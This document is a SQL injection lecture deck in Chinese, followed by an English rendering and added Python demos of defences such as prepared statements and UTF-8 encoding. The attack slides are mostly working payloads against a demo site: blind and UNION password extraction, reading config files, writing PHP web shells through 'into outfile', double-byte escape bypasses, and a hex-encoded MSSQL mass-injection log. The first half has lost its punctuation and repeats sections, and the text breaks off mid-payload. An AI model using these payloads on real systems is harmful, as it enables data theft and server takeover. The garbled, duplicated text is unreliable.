bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection Techniques – writing a file (when the quote restriction cannot be bypassed)
1. Find phpMyAdmin
2. Connect to MySQL remotely
mysql> use xssdb
mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027
mysql> prepare cmd from @a
mysql> execute cmd
@a decodes to:
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
The file written contains:
<?php @eval($_POST['cmd']);?>
SQL Injection Techniques - double-byte escape technique (1/3)
• Combines an injected lead byte with the backslash (0x5c) added by escaping into one multibyte character, so the escape no longer protects the quote
• Scenario
  – Escaping is done with
    • addslashes
    • mysql_escape_string
    • php.ini
      – magic_quotes_gpc enabled
  – The database uses Big5 or GBK encoding
    • set names gbk / set names big5
SQL Injection Techniques - double-byte escape technique (2/3)
• Chinese-language text is represented with two bytes per character
  – Big5
    • lead byte 0x81-0xFE, trail byte 0x40-0x7E or 0xA1-0xFE
  – GBK
    • lead byte 0x81-0xFE, trail byte 0x40-0x7E
  – GB2312
    • lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
  – Attack bytes: BF, CC, D5, …
SQL Injection Techniques - double-byte escape technique (3/3)
• Bypassing the escaping of a quoted parameter
  – http://www.hackdemo.com/searchUserLash.php?name=h%B5'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%CC'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
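The following Python example is added here and is not part of the original slides. It reproduces the mechanism of the three slides above without a database: a byte-wise escaper in the style of addslashes()/mysql_escape_string(), the decode step the server performs for a GBK or Big5 connection, and a charset-aware escaper of the kind the defence slide recommends. The payload bytes and the helper names (addslashes, quote_survives, escape_charset_aware) are this example's own.

```python
# Added example, not from the original slides: why byte-wise escaping
# (addslashes / mysql_escape_string) fails when the connection charset is
# GBK or Big5, and why the UTF-8 advice on the defence slide closes the hole.
# The payload bytes are constructed; no database is involved.
from typing import Optional


def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping as PHP's addslashes()/mysql_escape_string() do it:
    a 0x5C backslash is inserted before every quote, backslash or NUL byte,
    with no knowledge of the connection charset."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):  # ' " \ NUL
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives(raw: bytes, charset: str) -> bool:
    """Escape `raw` byte-wise, decode it the way the server does for the given
    connection charset, and report whether an unescaped single quote remains,
    i.e. whether the injected quote reaches the SQL parser."""
    text = addslashes(raw).decode(charset, errors="replace")
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return True
    return False


def escape_charset_aware(raw: bytes, charset: str) -> Optional[bytes]:
    """Charset-aware escaping (what mysql_real_escape_string does once the
    connection charset is set correctly): decode first, so a lone lead byte is
    rejected as malformed input instead of being paired with the backslash.
    Returns None for malformed input."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None
    text = text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return text.encode(charset)


# Constructed payload: lead byte 0xBF (one of the "attack bytes" BF/CC/D5 on
# the slide) immediately followed by a single quote.
PAYLOAD = b"h\xbf'"

if __name__ == "__main__":
    for cs in ("gbk", "big5", "utf-8"):
        print(cs, "quote survives:", quote_survives(PAYLOAD, cs))
    print("charset-aware escape of payload:", escape_charset_aware(PAYLOAD, "gbk"))
```

Under GBK and Big5 the backslash is swallowed as the trail byte of a two-byte character and the quote survives; under UTF-8 the lone 0xBF is simply an invalid byte and the backslash keeps protecting the quote. The charset-aware escaper refuses the payload outright, which is the behaviour to expect from mysql_real_escape_string or a parameterised query once the connection charset is set correctly.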
SQL Column Truncation – introduction (1/3)
• MySQL SQL mode
  – STRICT_ALL_TABLES not enabled
    • inserting a value longer than the column produces a warning
    • but the (truncated) row is still inserted
  – STRICT_ALL_TABLES enabled
    • inserting a value longer than the column produces a message
    • ERROR 1406 is raised and the row is not inserted
• Notable incident
  – 2008-09-07
    • WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation - effect (2/3)
SQL Column Truncation - defences (3/3)
• Actively strip whitespace from strings that should never contain it
  – e.g. account names
• Add BINARY to the comparison when SELECTing the data
• Configure MySQL to compare as BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
  – exceeding the column length raises an ERROR instead of a WARNING
  – to avoid that error on insert, extra checks may need to be added to the insert/update code
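The following Python example is added here and is not part of the original slides. It models a MySQL VARCHAR column in memory under the two SQL modes just described, so that the truncation effect and each of the listed defences (whitespace stripping, BINARY comparison, STRICT_ALL_TABLES) can be observed without a server. The column width, the user names and the helper names (store_username, find_user, register, validate_username) are this example's own.

```python
# Added example, not from the original slides: a small in-memory model of a
# MySQL VARCHAR column under the two SQL modes discussed, showing how silent
# truncation lets a second "admin" row appear and what each defence changes.
# Column width, table rows and user names are constructed for the demo.

COLUMN_LENGTH = 10  # models a VARCHAR(10) username column


class TruncationError(Exception):
    """Stands in for MySQL ERROR 1406 (Data too long for column)."""


def store_username(value: str, strict: bool) -> str:
    """Model of INSERT into a VARCHAR(COLUMN_LENGTH) column.
    strict=False: STRICT_ALL_TABLES off, the value is silently cut to the
                  column width (MySQL only emits a warning).
    strict=True:  STRICT_ALL_TABLES on, the statement fails instead."""
    if len(value) > COLUMN_LENGTH:
        if strict:
            raise TruncationError("Data too long for column 'username'")
        value = value[:COLUMN_LENGTH]
    return value


def pad_space_equal(a: str, b: str) -> bool:
    """Plain '=' on a PAD SPACE collation: trailing spaces are ignored,
    so 'admin     ' compares equal to 'admin'."""
    return a.rstrip(" ") == b.rstrip(" ")


def find_user(rows, username: str, binary: bool):
    """SELECT ... WHERE username = ?  (binary=True models adding BINARY to
    the comparison, i.e. an exact byte-for-byte match)."""
    if binary:
        return [r for r in rows if r == username]
    return [r for r in rows if pad_space_equal(r, username)]


def register(rows, username: str, strict: bool) -> bool:
    """Typical registration flow: refuse if the name already exists, else
    insert. The uniqueness check sees 'admin     x' as a new name, but the
    stored value is truncated to 'admin     ', which then matches 'admin'."""
    if find_user(rows, username, binary=False):
        return False
    rows.append(store_username(username, strict))
    return True


def validate_username(value: str) -> bool:
    """Application-side defence from the slide: reject whitespace in fields
    that must never contain it and enforce the column length up front."""
    return 0 < len(value) <= COLUMN_LENGTH and not any(c.isspace() for c in value)


def attack_scenario(strict: bool):
    """'admin' registers first; later someone registers 'admin', five spaces
    and 'x' (11 characters, one over the column width)."""
    rows = []
    register(rows, "admin", strict)
    register(rows, "admin     x", strict)
    return rows


if __name__ == "__main__":
    rows = attack_scenario(strict=False)
    print("rows after attack:", rows)
    print("lookup 'admin' without BINARY:", find_user(rows, "admin", binary=False))
    print("lookup 'admin' with BINARY:   ", find_user(rows, "admin", binary=True))
    print("validate 'admin     x':", validate_username("admin     x"))
```

In non-strict mode the second registration succeeds and a plain equality lookup for "admin" now returns two rows, which is exactly the ambiguity the WordPress 2.6.1 issue exploited. Adding BINARY narrows the lookup back to one row, strict mode rejects the over-length insert with an error, and validating the field before the INSERT removes the input altogether.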
SQL Injection – further thoughts
• Can the attack also happen through INSERT and UPDATE?
• NoSQL has no SQL injection?
• Other exploitation methods
  – Deep Blind Injection
  – Error-Based Injection
    • duplicate-key errors
    • function errors
  – information_schema
  – User-Defined Functions
  – Triggers
SQL Injection – automated tools
• Havij
• Pangolin
• w3af
• Jsky
• SQLmap
• …
Defending against SQL Injection properly
• Principle of least privilege
• Use prepared statements
• Use stored procedures
• Use UTF-8; avoid Big5 or GBK
• Check data types and cast explicitly
  – bool settype(mixed &$var, string $type)
  – intval, doubleval
• Use safe (encoding) functions
  – OWASP ESAPI
    • MySQLCodec
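The following Python example is added here and is not part of the original slides. It places the getUser lookup written by string concatenation (the pattern behind the getUser.php?id= examples in this deck) beside the two defences from the list above, type checking and a parameterised statement. It uses an in-memory SQLite table with constructed rows; the table layout and the function names (make_db, get_user_vulnerable, get_user_bound, get_user_safe) are this example's own, and the same pattern applies to MySQL through PDO or mysqli prepared statements.

```python
# Added example, not from the original slides: the getUser lookup written the
# vulnerable way (query text built by concatenation) next to the hardened
# version recommended on the slide (type check plus a parameterised
# statement). It uses an in-memory SQLite table with constructed rows; the
# same pattern applies to MySQL through PDO/mysqli prepared statements.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo table standing in for the slides' user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "alice", "pw-a"), (2, "bob", "pw-b"), (3, "carol", "pw-c")],
    )
    return conn


def get_user_vulnerable(conn: sqlite3.Connection, user_id: str):
    """Concatenation, as in the getUser.php?id= example: whatever arrives in
    'id' becomes part of the SQL text, so 'UNION SELECT' or 'OR 1=1' in the
    parameter is parsed as SQL."""
    sql = "SELECT id, name FROM user WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def get_user_bound(conn: sqlite3.Connection, user_id: str):
    """Parameter binding alone: the value is sent separately from the query
    text, so a payload is compared as a literal string and matches nothing."""
    return conn.execute("SELECT id, name FROM user WHERE id = ?", (user_id,)).fetchall()


def get_user_safe(conn: sqlite3.Connection, user_id: str):
    """Both defences from the slide: reject anything that is not an integer
    (the intval()/settype() step), then bind the value as a parameter."""
    if not user_id.isdigit():
        raise ValueError("id must be an integer")
    return conn.execute(
        "SELECT id, name FROM user WHERE id = ?", (int(user_id),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1 UNION SELECT 1, password FROM user"
    print("vulnerable:", get_user_vulnerable(db, payload))  # leaks every password
    print("bound only:", get_user_bound(db, payload))        # []
    print("safe:", get_user_safe(db, "1"))                   # [(1, 'alice')]
```

Binding alone already stops the injection, because the payload never reaches the parser as SQL; the explicit integer check on top of it turns a silently empty result into a logged error, which is what the slide's intval/settype advice buys in practice.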
MSSQL real-world case - 116jurist.ru automated injection (1/4)
• 2012/12/xx 10:03:31
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL real-world case - 116jurist.ru automated injection (2/4)
• 2012/12/xx 10:03:33
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL real-world case - 116jurist.ru automated injection (3/4)
• 2012/12/xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
